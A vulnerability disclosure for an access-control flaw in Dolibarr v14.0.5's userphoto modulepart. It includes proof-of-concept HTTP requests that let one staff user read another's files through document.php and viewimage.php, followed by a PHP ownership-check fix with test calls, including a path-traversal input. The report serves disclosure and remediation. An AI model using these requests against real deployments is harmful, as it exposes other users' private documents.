Improper Access Control (IDOR) in dolibarr/dolibarr
Valid
Reported on Feb 22nd 2022
Description
Dolibarr v14.0.5 has an improper access control (IDOR) issue in the userphoto modulepart: an authenticated user can retrieve files stored under another user's directory. The impact could lead to data exposure, as the attached files and documents may contain sensitive information about relevant parties such as contacts, suppliers, invoices, orders, stocks, agenda, accounting and more.
Proof of Concept
Scenario: Staff_2 requests a file belonging to Staff_3.
Tampered Request: using modulepart=user
GET /dolibarr/document.php?modulepart=user&entity=1&file=3/fileuser3.txt HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}
Expected Response:
Access denied. You try to access to a page, area or feature of a disabled module or without being in an authenticated session or that is not allowed to your user.
Current login: staff_2
Permission for this login can be defined by your Dolibarr administrator from menu Home->Users.
<SNIP><SNIP>
Tampered Request: using modulepart=userphoto
GET /dolibarr/document.php?modulepart=userphoto&attachment=0&file=3/fileuser3.txt&entity=1 HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}
Tampered Response:
Staff_3's file content is returned.
<SNIP><SNIP>
Tampered Request: using modulepart=userphoto
GET /dolibarr/viewimage.php?modulepart=userphoto&entity=1&file=3/fileuser3.txt&cache=0 HTTP/1.1
Host: localhost
Cookie: DOLSESSID_328fed74f1e6fdd21cc158ce6354602f={cookie_value}
Tampered Response:
Staff_3's file content is returned.
Impact
Through this vulnerability an authenticated user can download or read files of any type (pdf, zip, txt, jpg and more) belonging to other users, leading to sensitive information exposure of relevant parties.
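The missing check in both the document.php and viewimage.php paths is that the requested file belongs to the logged-in user. The following is an added illustrative example, not Dolibarr's own code: it assumes the leading directory of the file parameter is the owner's user id (as in 3/fileuser3.txt for Staff_3) and that a separate permission exists for roles allowed to read all users; the function and parameter names are assumptions.

```php
<?php
// Added example (not Dolibarr's code): ownership check for files served
// under the "userphoto" modulepart. Assumes the first path segment of the
// "file" parameter is the id of the user the file belongs to.

/**
 * Decide whether $userId may read $file under the userphoto modulepart.
 * $file is the raw "file" query value, e.g. "3/fileuser3.txt".
 * $canReadAllUsers models an explicit "read all users" permission
 * (assumed name) held by administrative roles.
 */
function userphoto_access_allowed(string $file, int $userId, bool $canReadAllUsers = false): bool
{
    // Accept only a plain relative path: no absolute paths, backslashes,
    // empty segments, "." or ".." traversal components.
    if ($file === '' || $file[0] === '/' || strpos($file, '\\') !== false) {
        return false;
    }
    $segments = explode('/', $file);
    foreach ($segments as $seg) {
        if ($seg === '' || $seg === '.' || $seg === '..') {
            return false;
        }
    }

    // The owner id must be a canonical decimal integer, so values such
    // as "03" or "3abc" are rejected rather than silently coerced.
    if (!ctype_digit($segments[0]) || $segments[0] !== (string) (int) $segments[0]) {
        return false;
    }
    $ownerId = (int) $segments[0];

    // Deny by default; allow only the owner or an explicitly permitted role.
    return $ownerId === $userId || $canReadAllUsers;
}

// Constructed calls mirroring the report: staff_2 (assumed id 2) asking for
// user 3's file, then the owner, then an administrative role.
var_dump(userphoto_access_allowed('3/fileuser3.txt', 2));
var_dump(userphoto_access_allowed('3/fileuser3.txt', 3));
var_dump(userphoto_access_allowed('3/fileuser3.txt', 2, true));
var_dump(userphoto_access_allowed('../conf/conf.php', 3));
```

The same function must be applied before serving a file for either the document.php download path or the viewimage.php view path, since the report shows both return the file.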